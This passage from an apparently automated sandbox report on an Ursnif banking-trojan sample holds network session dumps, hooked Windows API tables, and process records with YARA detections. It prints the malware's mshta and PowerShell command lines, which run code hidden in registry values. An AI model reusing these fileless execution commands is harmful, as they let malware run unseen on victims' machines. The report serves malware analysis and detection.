61 74 63 68 28 65 29 7b 7d 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 Data Ascii: <!DOCTYPE html><html><head>... JS for Typekit font Embedding --><script type="text/javascript" src="//use.typekit.net/iue6zbc.js"></script><script type="text/javascript">try{Typekit.load();}catch(e){}</script><meta name="viewport" content="width
2021-11-23 20:01:39 UTC	421	IN	Data Raw: 0d 0a Data Ascii:
2021-11-23 20:01:39 UTC	421	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.3	49820	87.248.118.22	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-23 20:01:39 UTC	421	OUT	GET /images/ULsdPIVaor8tHILk/0ulmqbrH6ITnKv9/hjuxJRtL9AnqjM_2F9/31KQzlJ4A/RADn_2B9K7qN4OIWzhqt/e9pg3qo9NJvDplsJyu_/2BINJhitzziIxZ5FGe3dQs/qXLEJMLfrql94/pbynvtsD/hbcZQz4rDORcqa20GNWm_2B/AEaRjxdvZi/WJoDjLGRG7wMNfA10/47LdHNX1Ihp_/2F5oAPCKnfW/OXUd0uJQ9lRCE3/_2Bk_2BnDXgKUHje_2FRL/1haIbjYdfbhVAxGo/8KwtG_2Fq/c.gif HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) Host: mail.yahoo.com Connection: Keep-Alive Cache-Control: no-cache
2021-11-23 20:01:39 UTC	421	IN	HTTP/1.1 302 Found referrer-policy: origin strict-transport-security: max-age=15552000 x-frame-options: DENY x-omg-env: norrin-blue--istio-production-ir2-75f46f56d5-4npg6 location: https://login.yahoo.com?.src=ym&pspid=159600001&activity=mail-direct&.lang=en-US&.intl=us&.done=https%3A%2F%2Fmail.yahoo.com%2Fd%2Fimages%2FULsdPIVaor8tHILk%2F0ulmqbrH6ITnKv9%2FhjuxJRtL9AnqjM_2F9%2F31KQzlJ4A%2FRADn_2B9K7qN4OIWzhqt%2Fe9pg3qo9NJvDplsJyu_%2F2BINJhitzziIxZ5FGe3dQs%2FqXLEJMLfrql94%2FpbynvtsD%2FhbcZQz4rDORcqa20GNWm_2B%2FAEaRjxdvZi%2FWJoDjLGRG7wMNfA10%2F47LdHNX1Ihp_%2F2F5oAPCKnfW%2FOXUd0uJQ9lRCE3%2F_2Bk_2BnDXgKUHje_2FRL%2F1haIbjYdfbhVAxGo%2F8KwtG_2Fq%2Fc.gif vary: Accept content-type: text/plain; charset=utf-8 content-length: 494
2021-11-23 20:01:39 UTC	422	IN	Data Raw: 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 63 68 69 6c 64 2d 73 72 63 20 62 6c 6f 62 3a 3b 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 69 6d 67 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 61 68 6f 6f 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 6e 71 2f 61 64 73 2f 6d 62 2f 6e 61 74 69 76 65 2f 2a 20 68 74 74 70 73 3a 2f 2f 73 65 72 76 69 63 65 2e 63 6d 70 2e 6f 61 74 68 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 70 2e 67 69 66 20 68 74 74 70 73 3a 2f 2f 73 6d 65 74 72 69 63 73 2e 61 74 74 2e 63 6f 6d 2f 69 64 20 68 74 74 70 73 3a 2f 2f 64 70 6d 2e 64 65 6d 64 65 78 2e 6e 65 74 2f 69 64 20 68 74 74 70 73 3a 2f Data Ascii: content-security-policy: child-src blob:;connect-src 'self' https://.yimg.com https://.yahoo.com https://s.yimg.com/nq/ads/mb/native/* https://service.cmp.oath.com https://www.yahoo.com/p.gif https://smetrics.att.com/id https://dpm.demdex.net/id https:/
2021-11-23 20:01:39 UTC	424	IN	Data Raw: 78 2d 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 63 68 69 6c 64 2d 73 72 63 20 62 6c 6f 62 3a 3b 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 69 6d 67 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 61 68 6f 6f 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 73 2e 79 69 6d 67 2e 63 6f 6d 2f 6e 71 2f 61 64 73 2f 6d 62 2f 6e 61 74 69 76 65 2f 2a 20 68 74 74 70 73 3a 2f 2f 73 65 72 76 69 63 65 2e 63 6d 70 2e 6f 61 74 68 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 70 2e 67 69 66 20 68 74 74 70 73 3a 2f 2f 73 6d 65 74 72 69 63 73 2e 61 74 74 2e 63 6f 6d 2f 69 64 20 68 74 74 70 73 3a 2f 2f 64 70 6d 2e 64 65 6d 64 65 78 2e 6e 65 74 2f 69 64 20 68 74 74 70 73 Data Ascii: x-content-security-policy: child-src blob:;connect-src 'self' https://.yimg.com https://.yahoo.com https://s.yimg.com/nq/ads/mb/native/* https://service.cmp.oath.com https://www.yahoo.com/p.gif https://smetrics.att.com/id https://dpm.demdex.net/id https
2021-11-23 20:01:39 UTC	427	IN	Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 79 61 68 6f 6f 2e 63 6f 6d 3f 2e 73 72 63 3d 79 6d 26 70 73 70 69 64 3d 31 35 39 36 30 30 30 30 31 26 61 63 74 69 76 69 74 79 3d 6d 61 69 6c 2d 64 69 72 65 63 74 26 2e 6c 61 6e 67 3d 65 6e 2d 55 53 26 2e 69 6e 74 6c 3d 75 73 26 2e 64 6f 6e 65 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 6d 61 69 6c 2e 79 61 68 6f 6f 2e 63 6f 6d 25 32 46 64 25 32 46 69 6d 61 67 65 73 25 32 46 55 4c 73 64 50 49 56 61 6f 72 38 74 48 49 4c 6b 25 32 46 30 75 6c 6d 71 62 72 48 36 49 54 6e 4b 76 39 25 32 46 68 6a 75 78 4a 52 74 4c 39 41 6e 71 6a 4d 5f 32 46 39 25 32 46 33 31 4b 51 7a 6c 4a 34 41 25 32 46 52 41 44 6e 5f 32 42 39 4b 37 71 4e 34 4f 49 57 7a 68 71 74 25 32 46 Data Ascii: Found. Redirecting to https://login.yahoo.com?.src=ym&pspid=159600001&activity=mail-direct&.lang=en-US&.intl=us&.done=https%3A%2F%2Fmail.yahoo.com%2Fd%2Fimages%2FULsdPIVaor8tHILk%2F0ulmqbrH6ITnKv9%2FhjuxJRtL9AnqjM_2F9%2F31KQzlJ4A%2FRADn_2B9K7qN4OIWzhqt%2F

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
9	192.168.2.3	49821	212.82.100.140	443	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
2021-11-23 20:01:39 UTC	427	OUT	GET /?.src=ym&pspid=159600001&activity=mail-direct&.lang=en-US&.intl=us&.done=https%3A%2F%2Fmail.yahoo.com%2Fd%2Fimages%2FULsdPIVaor8tHILk%2F0ulmqbrH6ITnKv9%2FhjuxJRtL9AnqjM_2F9%2F31KQzlJ4A%2FRADn_2B9K7qN4OIWzhqt%2Fe9pg3qo9NJvDplsJyu_%2F2BINJhitzziIxZ5FGe3dQs%2FqXLEJMLfrql94%2FpbynvtsD%2FhbcZQz4rDORcqa20GNWm_2B%2FAEaRjxdvZi%2FWJoDjLGRG7wMNfA10%2F47LdHNX1Ihp_%2F2F5oAPCKnfW%2FOXUd0uJQ9lRCE3%2F_2Bk_2BnDXgKUHje_2FRL%2F1haIbjYdfbhVAxGo%2F8KwtG_2Fq%2Fc.gif HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64) Connection: Keep-Alive Cache-Control: no-cache Host: login.yahoo.com
2021-11-23 20:01:39 UTC	428	IN	HTTP/1.1 200 OK X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 0 Age: 0 Pragma: no-cache Expires: 0 Referrer-Policy: origin Cache-Control: no-cache, no-store, must-revalidate set-cookie: AS=v=1&s=MddgKnnU&d=A619e9a23\|UPT70Dj.2SrKaZxt_6HV60TKkEwbZL_ceMxlGQJRnZ6BEhd_n1wEzLOefDF3wvFEVfOlN29BttM_07t9LMl2bynGNNWe8Hy5EAHwzwPgx2Igv601VcFLyupMKno2dZadhOqcz0BGahFCflKWDc.IFUeVD3SOlh.1k3Rp_j9Uc9HUTTeccDFQ9HKCaTEC22V.cvjDYFzgFB_78FUwl3CD5XfVb4Nwq5GJlOfT42zRiI3IlP7l04olNEgCQfrYjMHsqk5UqF9wdHVVj3HUjI1Oram38FoXv96AzJRDqdIhws5pM0y3yyYqj81a3TQfaS7Wcb.rMjySCFljhms.9A75ywLj5Btmnl1ir.U2kb4rgq5ZJFHm1CC_YFCaZOZTswH3p4_T5l9FlvWZ1UztndNSNt88nyt6HlqUhh0jd4Uwih6sB0eqmWwuUgs3PlG8QCjM5WAovBcvJRC7V24xgWNJ_dKos_e5ZyUROAzFlf1H6GyXwFGwgDTnNDAPg0vV_Dwq0shAZuVMCCQux3rVMj5OtfoO3pfPRSRJWtMcEhxrRzwjI15aImGDv.OSno38XjF97vJgEScQ0IQ.TWv26SCosNq71mEL7KnBPWVogyKkIPdIrOjjvvSBllQwyeOnRe3s8EtkFLt_88pe5mqeBiQgVkkfP6X8y8ddZdsDAJ_jCmGzRtpgG1r8B_DGNaxlRDwi64nuR3J1DEc6HVBWdx9HAx6pPcqYGZWMH2yh2x.3GNap04nMVFVzxZcMcAcnOOx4GVN.j4h07q8UTo.h9z0NyBUCXkSoHjVuuv2vf0B6m3NKjaG.AifmxxtA588nnpQRY09snAo1lzE97UAUlWku1w7zGBpUraG8mzQQD.mSmbp9pvNeQymPQsaZuJeemqEaMGZ36xsgLwNBxwvgLGnvEVxZOi8fMPo60SCCBQ7q1xEQgzNo2iYFfDq2CyMGHO1mkjXxpykBUlsdZ5dk331cbvLw8TR1xWOHr4SqgOnYCvEHVRD8zfuKdmLZ8UK5Vk8tsMXlqD1Zg27rMAuc0n_v4QhlmxvAJlLXcXh3amVcAm91YfiOXtDcg_PMUi4Hna0ZfSRKihfshbPfvVCsWCPFpQ6kReO0v3PgMQE-~A; path=/; domain=login.yahoo.com; secure; HttpOnly Content-Type: text/html; charset=utf-8 Content-Length: 41311 Content-Security-Policy: base-uri 'self';child-src 'self' https://login.yahoo.net https://s.yimg.com https://s1.yimg.com;connect-src 'self' https://geo.yahoo.com https://pr.comet.yahoo.com https://ws.progrss.yahoo.com https://udc.yahoo.com https://jsapi.login.yahoo.com;default-src 'self' https://s.yimg.com https://s1.yimg.com https://login.yahoo.net;font-src https://s.yimg.com https://s1.yimg.com;frame-src 'self' https://login.yahoo.net https://s.yimg.com https://s1.yimg.com;img-src 'self' data: https://yahoo.com https://ct.yimg.com https://s.yimg.com https://s1.yimg.com https://tw.yimg.com https://geo.yahoo.com https://socialprofiles.zenfs.com https://.wc.yahoodns.net https://beap-bc.yahoo.com https://ws.progrss.yahoo.com https://log.fc.yahoo.com https://backyard.yahoo.com https://.ah.yahoo.com https://pr-bh.ybp.yahoo.com https://fbcdn.net https://scontent.xx.fbcdn.net https://z-m-scontent.xx.fbcdn.net https://graph.facebook.com https://data.mail.yahoo.com https://platform-lookaside.fbsbx.com;media-src https://.ah.yahoo.com;object-src 'none';report-uri https://csp.yahoo.com/beacon/csp?src=mbr_account;script-src 'unsafe-inline' 'self' https://s.yimg.com https://s1.yimg.com https://query.yahoo.com https://.query.yahoo.com https://y.analytics.yahoo.com https://jsapi.login.yahoo.com https://fc.yahoo.com https://e2e.fc.yahoo.com https://pr.comet.yahoo.com 'nonce-uy3A1C0tOdPfqRc7doAmOzxfHC3nwwxRA3S3FsGm2JyzeuWc' ;style-src * 'unsafe-inline' Vary: Accept-Encoding Date: Tue, 23 Nov 2021 20:01:39 GMT Connection: close Strict-Transport-Security: max-age=15552000 Server: ATS Expect-CT: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only" Set-Cookie: A1=d=AQABBKNInWECEO0_t0Obu4dZoYjrfXb16ucFEgEBAQGanmGnYQAAAAAA_eMAAA&S=AQAAAmnMFfQ41Tpl_C-GRQVOYP0; Expires=Thu, 24 Nov 2022 02:01:39 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/; SameSite=Lax; Secure; HttpOnly Set-Cookie: A3=d=AQABBKNInWECEO0_t0Obu4dZoYjrfXb16ucFEgEBAQGanmGnYQAAAAAA_eMAAA&S=AQAAAmnMFfQ41Tpl_C-GRQVOYP0; Expires=Thu, 24 Nov 2022 02:01:39 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/; SameSite=None; Secure; HttpOnly Set-Cookie: A1S=d=AQABBKNInWECEO0_t0Obu4dZoYjrfXb16ucFEgEBAQGanmGnYQAAAAAA_eMAAA&S=AQAAAmnMFfQ41Tpl_C-GRQVOYP0&j=WORLD; Domain=.yahoo.com; Path=/; SameSite=Lax; Secure Set-Cookie: B=efqnlepgpqi53&b=3&s=pr; Expires=Thu, 24 Nov 2022 02:01:39 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/ Set-Cookie: GUC=AQEBAQFhnpphp0IlVwUF; Expires=Thu, 24 Nov 2022 02:01:39 GMT; Max-Age=31557600; Domain=.yahoo.com; Path=/; Secure
2021-11-23 20:01:39 UTC	432	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 69 64 3d 22 53 74 65 6e 63 69 6c 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 67 72 69 64 20 6c 69 67 68 74 2d 74 68 65 6d 65 20 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 6d 61 74 2d 64 65 74 65 63 74 69 6f Data Ascii: <!DOCTYPE html><html id="Stencil" class="no-js grid light-theme "> <head> <meta charset="utf-8"> <meta name="viewport" content="initial-scale=1, maximum-scale=1, user-scalable=0, shrink-to-fit=no"/> <meta name="format-detectio
2021-11-23 20:01:39 UTC	436	IN	Data Raw: 72 48 36 49 54 6e 4b 76 39 25 32 46 68 6a 75 78 4a 52 74 4c 39 41 6e 71 6a 4d 5f 32 46 39 25 32 46 33 31 4b 51 7a 6c 4a 34 41 25 32 46 52 41 44 6e 5f 32 42 39 4b 37 71 4e 34 4f 49 57 7a 68 71 74 25 32 46 65 39 70 67 33 71 6f 39 4e 4a 76 44 70 6c 73 4a 79 75 5f 25 32 46 32 42 49 4e 4a 68 69 74 7a 7a 69 49 78 5a 35 46 47 65 33 64 51 73 25 32 46 71 58 4c 45 4a 4d 4c 66 72 71 6c 39 34 25 32 46 70 62 79 6e 76 74 73 44 25 32 46 68 62 63 5a 51 7a 34 72 44 4f 52 63 71 61 32 30 47 4e 57 6d 5f 32 42 25 32 46 41 45 61 52 6a 78 64 76 5a 69 25 32 46 57 4a 6f 44 6a 4c 47 52 47 37 77 4d 4e 66 41 31 30 25 32 46 34 37 4c 64 48 4e 58 31 49 68 70 5f 25 32 46 32 46 35 6f 41 50 43 4b 6e 66 57 25 32 46 4f 58 55 64 30 75 4a 51 39 6c 52 43 45 33 25 32 46 5f 32 42 6b 5f 32 42 6e Data Ascii: rH6ITnKv9%2FhjuxJRtL9AnqjM_2F9%2F31KQzlJ4A%2FRADn_2B9K7qN4OIWzhqt%2Fe9pg3qo9NJvDplsJyu_%2F2BINJhitzziIxZ5FGe3dQs%2FqXLEJMLfrql94%2FpbynvtsD%2FhbcZQz4rDORcqa20GNWm_2B%2FAEaRjxdvZi%2FWJoDjLGRG7wMNfA10%2F47LdHNX1Ihp_%2F2F5oAPCKnfW%2FOXUd0uJQ9lRCE3%2F_2Bk_2Bn
2021-11-23 20:01:39 UTC	445	IN	Data Raw: 2b 31 29 26 23 78 32 30 32 43 3b 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 72 6f 6c 65 3d 22 6f 70 74 69 6f 6e 22 20 64 61 74 61 2d 63 6f 64 65 3d 22 2b 39 37 35 22 20 76 61 6c 75 65 3d 22 42 54 22 20 3e 42 68 75 74 61 6e 20 26 23 78 32 30 32 41 3b 28 2b 39 37 35 29 26 23 78 32 30 32 43 3b 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 72 6f 6c 65 3d 22 6f 70 74 69 6f 6e 22 20 64 61 74 61 2d 63 6f 64 65 3d 22 2b 35 39 31 22 20 76 61 6c 75 65 3d 22 42 4f 22 20 3e 42 6f 6c 69 76 69 61 20 26 23 78 32 30 32 41 3b 28 2b 35 39 31 29 26 23 78 32 30 32 43 3b 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 72 6f 6c 65 3d 22 6f 70 74 69 6f 6e 22 20 64 61 74 61 2d 63 6f Data Ascii: +1)‬</option> <option role="option" data-code="+975" value="BT" >Bhutan ‪(+975)‬</option> <option role="option" data-code="+591" value="BO" >Bolivia ‪(+591)‬</option> <option role="option" data-co
2021-11-23 20:01:39 UTC	461	IN	Data Raw: 6c 75 65 3d 22 53 49 22 20 3e 53 6c 6f 76 65 6e 69 61 20 26 23 78 32 30 32 41 3b 28 2b 33 38 36 29 26 23 78 32 30 32 43 3b 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 72 6f 6c 65 3d 22 6f 70 74 69 6f 6e 22 20 64 61 74 61 2d 63 6f 64 65 3d 22 2b 36 37 37 22 20 76 61 6c 75 65 3d 22 53 42 22 20 3e 53 6f 6c 6f 6d 6f 6e 20 49 73 6c 61 6e 64 73 20 26 23 78 32 30 32 41 3b 28 2b 36 37 37 29 26 23 78 32 30 32 43 3b 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 72 6f 6c 65 3d 22 6f 70 74 69 6f 6e 22 20 64 61 74 61 2d 63 6f 64 65 3d 22 2b 32 35 32 22 20 76 61 6c 75 65 3d 22 53 4f 22 20 3e 53 6f 6d 61 6c 69 61 20 26 23 78 32 30 32 41 3b 28 2b 32 35 32 29 26 23 78 32 30 32 43 3b 3c 2f 6f 70 74 69 6f 6e Data Ascii: lue="SI" >Slovenia ‪(+386)‬</option> <option role="option" data-code="+677" value="SB" >Solomon Islands ‪(+677)‬</option> <option role="option" data-code="+252" value="SO" >Somalia ‪(+252)‬</option
2021-11-23 20:01:39 UTC	468	IN	Data Raw: 25 32 46 31 68 61 49 62 6a 59 64 66 62 68 56 41 78 47 6f 25 32 46 38 4b 77 74 47 5f 32 46 71 25 32 46 63 2e 67 69 66 22 20 69 64 3d 22 6d 62 72 2d 66 6f 72 67 6f 74 2d 6c 69 6e 6b 22 20 64 61 74 61 2d 79 6c 6b 3d 22 65 6c 6d 3a 62 74 6e 3b 65 6c 6d 74 3a 66 6f 72 67 6f 74 3b 73 6c 6b 3a 66 6f 72 67 6f 74 3b 6d 6b 65 79 3a 6c 6f 67 69 6e 2d 6c 61 6e 64 69 6e 67 2d 66 6f 72 67 6f 74 22 20 64 61 74 61 2d 72 61 70 69 64 2d 74 72 61 63 6b 69 6e 67 3d 22 74 72 75 65 22 3e 46 6f 72 67 6f 74 c2 a0 75 73 65 72 6e 61 6d 65 3f 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 Data Ascii: %2F1haIbjYdfbhVAxGo%2F8KwtG_2Fq%2Fc.gif" id="mbr-forgot-link" data-ylk="elm:btn;elmt:forgot;slk:forgot;mkey:login-landing-forgot" data-rapid-tracking="true">Forgotusername?</a> </span> </div> </div> <div class

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
CreateProcessAsUserW	EAT	explorer.exe
CreateProcessAsUserW	INLINE	explorer.exe
CreateProcessW	EAT	explorer.exe
CreateProcessW	INLINE	explorer.exe
CreateProcessA	EAT	explorer.exe
CreateProcessA	INLINE	explorer.exe
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	explorer.exe
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	explorer.exe

Processes

Process: explorer.exe, Module: KERNEL32.DLL

Function Name	Hook Type	New Data
CreateProcessAsUserW	EAT	7FFC8BAF521C
CreateProcessAsUserW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessW	EAT	7FFC8BAF5200
CreateProcessW	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00
CreateProcessA	EAT	7FFC8BAF520E
CreateProcessA	INLINE	0xFF 0xF2 0x25 0x50 0x00 0x00

Process: explorer.exe, Module: WININET.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFC8BAF5200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	5B1A300

Process: explorer.exe, Module: user32.dll

Function Name	Hook Type	New Data
api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW	IAT	7FFC8BAF5200
api-ms-win-core-registry-l1-1-0.dll:RegGetValueW	IAT	5B1A300

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: FpYf5EGDO9.exe PID: 5556 Parent PID: 3100

General

Start time:	20:58:32
Start date:	23/11/2021
Path:	C:\Users\user\Desktop\FpYf5EGDO9.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FpYf5EGDO9.exe"
Imagebase:	0x400000
File size:	299520 bytes
MD5 hash:	2F1743897AFA6F586AE97F53BF55C14E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.397698170.00000000046FC000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.351603382.00000000048F8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.511067245.0000000004500000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.397157084.00000000048F8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.351549542.00000000048F8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.449933365.0000000005C38000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.351505235.00000000048F8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.508974340.0000000004339000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.397014247.00000000047FA000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.397054517.0000000004879000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.351619714.00000000048F8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.396094392.00000000048F8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.351527418.00000000048F8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.351580737.00000000048F8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.351432716.00000000048F8000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.351478648.00000000048F8000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	low

Chronological Activities

Analysis Process: mshta.exe PID: 4720 Parent PID: 3352

General

Start time:	20:59:27
Start date:	23/11/2021
Path:	C:\Windows\System32\mshta.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\mshta.exe" "about:<hta:application><script>Mq8m='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Mq8m).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
Imagebase:	0x7ff671440000
File size:	14848 bytes
MD5 hash:	197FC97C6A843BEBB445C1D9C58DCBDB
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: powershell.exe PID: 4856 Parent PID: 4720

General

Start time:	20:59:29
Start date:	23/11/2021
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex ([System.Text.Encoding]::ASCII.GetString(( gp "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
Imagebase:	0x7ff777fc0000
File size:	447488 bytes
MD5 hash:	95000560239032BC68B4C2FDFCDEF913
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000E.00000003.484252773.000001A99926C000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 0000000E.00000002.592498182.000001A99050B000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 4488 Parent PID: 4856

General

Start time:	20:59:29
Start date:	23/11/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7f20f0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: csc.exe PID: 6736 Parent PID: 4856

General

Start time:	20:59:46
Start date:	23/11/2021
Path:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i1aaekli.cmdline
Imagebase:	0x7ff76af80000
File size:	2739304 bytes
MD5 hash:	B46100977911A0C9FB1C3E5F16A5017D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Chronological Activities

Analysis Process: control.exe PID: 2904 Parent PID: 5556

General

Start time:	20:59:48
Start date:	23/11/2021
Path:	C:\Windows\System32\control.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\control.exe -h
Imagebase:	0x7ff68e550000
File size:	117760 bytes
MD5 hash:	625DAC87CB5D7D44C5CA1DA57898065F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
